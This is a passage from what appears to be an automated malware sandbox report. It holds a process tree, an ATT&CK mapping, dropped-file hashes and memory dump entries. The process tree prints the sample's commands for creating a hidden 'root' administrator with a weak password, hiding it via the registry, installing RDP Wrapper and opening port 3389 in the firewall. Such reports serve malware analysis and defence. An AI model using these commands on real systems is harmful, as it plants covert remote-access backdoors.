        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:4656
        
        C:\Windows\SysWOW64\net.exe
        
        net user root /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:1376
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user root /add
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:2344
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup Çñ¼¿¡¿ßΓαáΓ«αδ root /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:464
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Çñ¼¿¡¿ßΓαáΓ«αδ root /add
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:3104
        
        C:\Windows\SysWOW64\net.exe
        
        net user root 12345
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:1064
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user root 12345
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:1952
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v root /t REG_DWORD /d 0 /f
        10⤵
        Hide Artifacts: Hidden Users
        System Location Discovery: System Language Discovery
        
        PID:3980
        
        C:\ProgramData\RDP\RDPWInst.exe
        
        "C:\ProgramData\RDP\RDPWInst.exe" -i -o
        10⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3148
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        11⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:2372
        
        C:\ProgramData\RDP\RDPWInst.exe
        
        "C:\ProgramData\RDP\RDPWInst.exe" -w
        10⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2620

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4612

C:\ProgramData\CardWindows\CDevice.exe
C:\ProgramData\CardWindows\CDevice.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:764
- C:\ProgramData\CardWindows\sysdevices.exe
  C:\ProgramData\CardWindows\sysdevices.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:1516
- - C:\ProgramData\CardWindows\sysdevices.exe
    C:\ProgramData\CardWindows\sysdevices.exe /tray
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: SetClipboardViewer
    PID:4376
- C:\ProgramData\CardWindows\sysdevices.exe
  C:\ProgramData\CardWindows\sysdevices.exe /tray
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3040

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1740

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:2120

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:3820

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\RDP Wrapper\rdpwrap.dll

Filesize
114KB

MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
C:\ProgramData\CardWindows\Builder2.exe

Filesize
368KB

MD5
5bc1cdb63ab6345843d7254ee51eb3cd

SHA1
54b5ec6185bbb3d33c17fd24c6143cf9372168b2

SHA256
5e0c07ccca39ab7e0d5a59d7f71b79a6c786a9ef65e3c53f1934016bf490d2ae

SHA512
6768769a22e4075eb3c2bbe8784e3eea79f0d2b709f43627742adc9b6610ed0f3d4f7327e6d10f898f68e7bf808c540c76ae2098b803ff784a829066151b980d

Download Submit
C:\ProgramData\CardWindows\CDevice.exe

Filesize
6.0MB

MD5
60478b65ab22e759c71f1923edb1bbab

SHA1
4268fc2bf9ff27ec280416b12bb0de96e9ae718d

SHA256
047274a242de93573a5f83fb152554a68dfa12ac877f5f9919dec5e62b70ada0

SHA512
2921917b17de2ef41e10619d86a5a4a34fe9da8d05870135781342a7c6b171827e868f351d9961fa4844bb37a29ab2278d6d38ce231022f820a7310e97669580

Download Submit
C:\ProgramData\CardWindows\RDP.exe

Filesize
1.8MB

MD5
06500c519e9a20c6851d55e4ec6a1bff

SHA1
d09baa50160cd02e31f3f617ea24e1f655dd67cb

SHA256
3a427942a462adc64695f62480b63470edef3e46599442e6fb517397967475d0

SHA512
217ff7685d97c6563a57497620cfa33e21683ec963c69b77054d04a339ffddd198e0835e73f2cce1606ce860f91feb1463ced22b392049d1b693e471d30bcec8

Download Submit
C:\ProgramData\CardWindows\Russian.lg

Filesize
48KB

MD5
e44e34bc285b709f08f967325d9c8be1

SHA1
e73f05c6a980ec9d006930c5343955f89579b409

SHA256
1d99a7b5f7b3daa61fa773972b1e335aa09b92411484f6ddc99d2b2894455a5b

SHA512
576b292b6e9cf022822443e050994462a6cbd9a3c60063bae9f54c78a84e75e17bb5eddf7e259a22a9d93f757cb6536c503762e2a30e75091e40c2756cde8727

Download Submit
C:\ProgramData\CardWindows\SysInstall.bat

Filesize
1KB

MD5
a00d1b7d978dcd3728e14c3f0e2386df

SHA1
596deee85bd6521c9d3fb7ffe3654aa0b386e9ed

SHA256
00baf3f49d72d9ae56cd5dbfbcd0a3a87b88ae3e768cbfe8a77769fd443a1cd5

SHA512
fe8a3752ba3bfddeb979f0a3cb8787218525057b873481f24169c6629851f862059ceb1cc52ed03f6b1bea87866833a107226b6a1a5ab969b959de0d56987c80

Download Submit
C:\ProgramData\CardWindows\SysInstall2.bat

Filesize
269B

MD5
ad964d1f40f1ab48e26d9ff0bdc01d06

SHA1
073396d19000036396005d9ebf89f40fb481e1e5

SHA256
632b75ab4857c964f8cf1f61efeff7a1bc7583fca3e9fbef9bca768ee227b9ff

SHA512
f671e8bcb42f757d5384c8be7bde6abe18a1196834948ded0634152c4ef0608c972be417082035b7640178d26810fe8dc25b128c1e18d1d343e1b9f9c475d255

Download Submit
C:\ProgramData\CardWindows\SystemCard.dat

Filesize
647B

MD5
2db0f5ade581516ccd80880197a007ff

SHA1
9dd8379da351d1c8361169d0548a25ad13c14973

SHA256
9b0e0a3cd2e3694bfa85335d8ec3b59a6e92bd37592604a65e32b310b61458d3

SHA512
8fffa0271c81cfd37194e2b405c2b35e949b08eec08e93be5b49d268d9ec4b58aaa9c5038b316589c5ac6444fb969b37a17c71ed8b1665dc3ca56f30b857c103

Download Submit
C:\ProgramData\CardWindows\WinDevInstall.exe

Filesize
6.5MB

MD5
ff45bfaab4ba3c580e91c4c23b6084cc

SHA1
bbcb6a4f8c1c5497e0af0634bc11f7fc3d552515

SHA256
edfa3acae5def78b893e14b977d9dc3b80d245047538b42bc9ededebe85e9e4c

SHA512
fb17e0ccca35848945fff3ba6418167dda3afe15919517169483bd26018bcddc272e448aa2e93cdbf6534b4a0a3288f326c7d394f6b6c74d4bb2e19217a022b0

Download Submit
C:\ProgramData\CardWindows\WinUpdate.exe

Filesize
4.3MB

MD5
436658cb9c13960ecdb332ec02cc1388

SHA1
33c6b18a1a0ef78fbc9496893dd32bbce7fd47ff

SHA256
ba83d27a14161c57f58bed535843fc3cd64b39853e787b01e73517360e9923a7

SHA512
231b82bb53ef894b1907a0c644dc9ec7a6267783193310f97200be37beb1805462fa834bc7e46b7e3c03e149602169373549c6e937744e9fdd9e56a34e731ab4

Download Submit
C:\ProgramData\CardWindows\WinUpdate1.exe

Filesize
379KB

MD5
a36f89d64e0de0fe14ba911713df29eb

SHA1
7d700fa255f32aa37b82dc59826cf35300b250d4

SHA256
d1deecb8f672e32316a71444f1500be8381f64741445f138704876274e131a1c

SHA512
55ac398815ce5e00e18a839f0d12984488e6ee4e1eb69396a6bc01e12a86bc3256308f164cd52d5b6c733c77cb18f008a03921c831c62fd0d4d0a7b7184a6e57

Download Submit
C:\ProgramData\CardWindows\config_set.reg

Filesize
11KB

MD5
82f7c0371b66396fa77327164ebdc663

SHA1
01f04fd37ad25fb4b23a145d75f2eb02204c7023

SHA256
0151be83dd9f7f4db86cb94642bfbc339cdd1d67f6b8a15ac74feac735986e5d

SHA512
b497191464674f5ea27b26ae5ea3a381e5ee34bc5515164a20c8c40ee6788457c9bfbf39f0a27b68737c25ba0f09bc0510bdf6d4fee0c0679288d96ba63a2622

Download Submit
C:\ProgramData\CardWindows\start.exe

Filesize
394KB

MD5
e58793d6f2eb99a540797b64fa11a9e3

SHA1
b3638113405efc8eadc7d7638d6d47f5319cf811

SHA256
1a978563255ada2ee332405f2a553842e131475f06e6dfaa38166358bbd9683b

SHA512
05f372d2b97764745922d0a4ad908d8ae0b439109e3702824cc162ed0b4f1347381481469943f5521a8bf90471e1cbc2fad088bf33a4ea8224c187b1f8a8ec22

Download Submit
C:\ProgramData\CardWindows\start1.exe

Filesize
394KB

MD5
8c83dc3eb8124dd9cdaa95a0a1ad45d4

SHA1
9428c90a79281d5dc84205e435833f0c75f4ae3c

SHA256
35c5a75bce725f0132ebd59c5c8f090df3f0fb70e8f0f83cad8f9983a58a887b

SHA512
f2a1856ad6189fd189d64922e80201957f19601f05783a1b5543bb62f4e2921074a3dc522bf4b4307ea1ac2f1e2e18de9384d86a721073a332d75ac309c82d5d

Download Submit
C:\ProgramData\CardWindows\sysdevices.exe

Filesize
5.1MB

MD5
271dc5107c866fd480b1256f0ce0e36c

SHA1
0d9c7e060b57a8177664233ad99049963b3fd83b

SHA256
dfa101c21fba688512ef911988e1d72199c1ec5c3571f91da214faa0fac7cba4

SHA512
fb23837f2c69c5f0a938ff3f44a8158321394117c9466a0fa6865fd85914f51970f4afe0873e440e4ad6d502d839cb57c07b502905641dceebeae5eb61143784

Download Submit
C:\ProgramData\CardWindows\vp8decoder.dll

Filesize
378KB

MD5
d43fa82fab5337ce20ad14650085c5d9

SHA1
678aa092075ff65b6815ffc2d8fdc23af8425981

SHA256
c022958429edd94bfe31f2eacfe24ff6b45d6f12747725c449a36116373de03b

SHA512
103e61a9f58df03316676a074487e50ec518479c11068df3736df139b85c7671048c65bce0ef2c55b3c50c61fde54e9e6c7d1b795aea71263ae94c91d4874e0d

Download Submit
C:\ProgramData\CardWindows\vp8encoder.dll

Filesize
1.6MB

MD5
dab4646806dfca6d0e0b4d80fa9209d6

SHA1
8244dfe22ec2090eee89dad103e6b2002059d16a

SHA256
cb6ef96d3a66ef08ec2c8640b751a52d6d4f4530cf01162a69966f0fd5153587

SHA512
aa5eb93bf23a10de797d6fb52a55a95d36bc48927c76fedd81e0c48872745cb7f7d1b3f230eaae42fd4e79b6a59ca707e56bd6963b03644cbd5984f11e98d6e7

Download Submit
C:\ProgramData\RDP\RDPWInst.exe

Filesize
1.3MB

MD5
9c257b1d15817a818a675749f0429130

SHA1
234d14da613c1420ea17de60ab8c3621d1599f6f

SHA256
b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c

SHA512
b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521

Download Submit
C:\ProgramData\RDP\RDPWrapper.exe

Filesize
1.6MB

MD5
e4814efdb3d6761683665c487a02ef2b

SHA1
ecd25ee74af98658000e36b90c58af628b6ab6b8

SHA256
5f4aa202be2bb72123a8aac89322e00bf8d8daf027d510bb368df3dd093a7e23

SHA512
982558f59250bc213de5f27e7aac5fa5975e0ab9c979d23e4836b0a493c598d1d804c42d5a9faa1214892b4b1c2c6733be44a00966f65bdbb62946198d08d0e5

Download Submit
C:\ProgramData\RDP\RDPWrapper_run.exe

Filesize
368KB

MD5
35862d6de7d5f5a21a111f4e9c831839

SHA1
891e59e3a6798ac60ef333cdfb7969ef02a3e77c

SHA256
5f701eb1a3d0aeea8242431cf44b6ceccb364c2f430b8577bcfa4e6a3fca7b55

SHA512
00868a01af48be7d2c5c619891c77620e616ac05969c2c3dd146f551976b59be476ce6cbbaf87888aa14d5de2aa498a469440f0085f1ae063e7681e7a44cef56

Download Submit
C:\ProgramData\RDP\run.bat

Filesize
612B

MD5
4e6a1033e3c2f39db397d392fe0d7c77

SHA1
11526234cd216334902d51665529c2b9be7acc05

SHA256
2eb8001ce06e7b2764fb7b4e637d53583e365640e72a3d53e1d3b4790ae306d4

SHA512
395293d8ecd67f4c32702b11fdf0761f9e283346274ee1e4c4a3f47672fc683be4917fd87da2fde4e3d7e986e3884799329f9f28082e89f75aa17ca38c46dceb

Download Submit
C:\ProgramData\RDP\run.exe

Filesize
368KB

MD5
c4f61801834172c1f1973e8791311340

SHA1
de48c219435feda6680c474b445c8f548441abc7

SHA256
c396dcc91a1fe215773eef9435d35734d76e7324ba1a40b46fa15f43acb3488d

SHA512
8fc16d1375f20a531593873aac252f0394315004bc51e55e14c0e93f2ea76272a6965da30228a7f16e01e1e42a49ec759afd46c6b914154c766c1a8d39b2a0b7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419

Filesize
471B

MD5
969948a3e3cf9ddd3942ff0fcc85fb01

SHA1
aa7736d59eea6881d5eaea926aa1753ab0f93268

SHA256
981807f7e54a3b187ca1a15000c8c20d8cc9974f5239830651d51cf39bde9c71

SHA512
6b6076415f61a7963f92fd8701285a832b9d14cbd578634f3f83fe280ade97e3370595b372edd53c693003d3d6c2092f8daf4a940101a61d4ebc2953a24ba339

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419

Filesize
412B

MD5
dd3c590344d01b8058c5e18b1a6fb935

SHA1
2e6fa6a6de21fcc17f2010ecaad2056ac7bff345

SHA256
402467d6fc087615c937351da67f96810eefde766adcb5f36f96ca441d613593

SHA512
a2e64c5771db43c1bb88ae8a83b65b4f47b73e29b5756a26c0af83e836ee330ca92a2a2a0d20bf114646f6fe1a1e6dd714990fc5a91abfc542c12af69a0fb883

Download Submit
C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp

Filesize
36B

MD5
8708699d2c73bed30a0a08d80f96d6d7

SHA1
684cb9d317146553e8c5269c8afb1539565f4f78

SHA256
a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f

SHA512
38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.ini

Filesize
128KB

MD5
dddd741ab677bdac8dcd4fa0dda05da2

SHA1
69d328c70046029a1866fd440c3e4a63563200f9

SHA256
7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668

SHA512
6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec

Download Submit
memory/764-171-0x0000000000400000-0x0000000000A9F000-memory.dmp

Filesize
6.6MB

Download
memory/764-178-0x0000000000400000-0x0000000000A9F000-memory.dmp

Filesize
6.6MB

Download
memory/764-209-0x0000000000400000-0x0000000000A9F000-memory.dmp

Filesize
6.6MB

Download
memory/764-192-0x0000000000400000-0x0000000000A9F000-memory.dmp

Filesize
6.6MB

Download
memory/764-188-0x0000000000400000-0x0000000000A9F000-memory.dmp

Filesize
6.6MB

Download
memory/764-182-0x0000000000400000-0x0000000000A9F000-memory.dmp

Filesize
6.6MB

Download
memory/764-175-0x0000000000400000-0x0000000000A9F000-memory.dmp

Filesize
6.6MB

Download
memory/764-168-0x0000000000400000-0x0000000000A9F000-memory.dmp

Filesize
6.6MB

Download
memory/1052-83-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1516-169-0x0000000000400000-0x00000000009A8000-memory.dmp

Filesize
5.7MB

Download
memory/2156-78-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/2268-56-0x0000000000400000-0x0000000000468000-memory.dmp

Filesize
416KB

Download
memory/2620-165-0x0000000000400000-0x0000000000553000-memory.dmp

Filesize
1.3MB

Download
memory/2816-133-0x0000000000400000-0x0000000000A9F000-memory.dmp

Filesize
6.6MB

Download
memory/2880-131-0x0000000000400000-0x0000000000A9F000-memory.dmp

Filesize
6.6MB

Download
memory/3040-194-0x0000000000400000-0x00000000009A8000-memory.dmp

Filesize
5.7MB

Download
memory/3040-170-0x0000000000400000-0x00000000009A8000-memory.dmp

Filesize
5.7MB

Download
memory/3040-173-0x0000000000400000-0x00000000009A8000-memory.dmp

Filesize
5.7MB

Download
memory/3040-184-0x0000000000400000-0x00000000009A8000-memory.dmp

Filesize
5.7MB

Download
memory/3040-177-0x0000000000400000-0x00000000009A8000-memory.dmp

Filesize
5.7MB

Download
memory/3104-27-0x0000000000400000-0x0000000000435000-memory.dmp

Filesize
212KB

Download
memory/3148-160-0x0000000000400000-0x0000000000553000-memory.dmp

Filesize
1.3MB

Download
memory/3448-126-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3608-45-0x0000000000400000-0x0000000000468000-memory.dmp

Filesize
416KB

Download
memory/3680-107-0x0000000000400000-0x0000000000465000-memory.dmp

Filesize
404KB

Download
memory/3712-53-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4336-148-0x0000000000400000-0x0000000000A9F000-memory.dmp

Filesize
6.6MB

Download
memory/4376-167-0x0000000000400000-0x00000000009A8000-memory.dmp

Filesize
5.7MB

Download
memory/4872-51-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download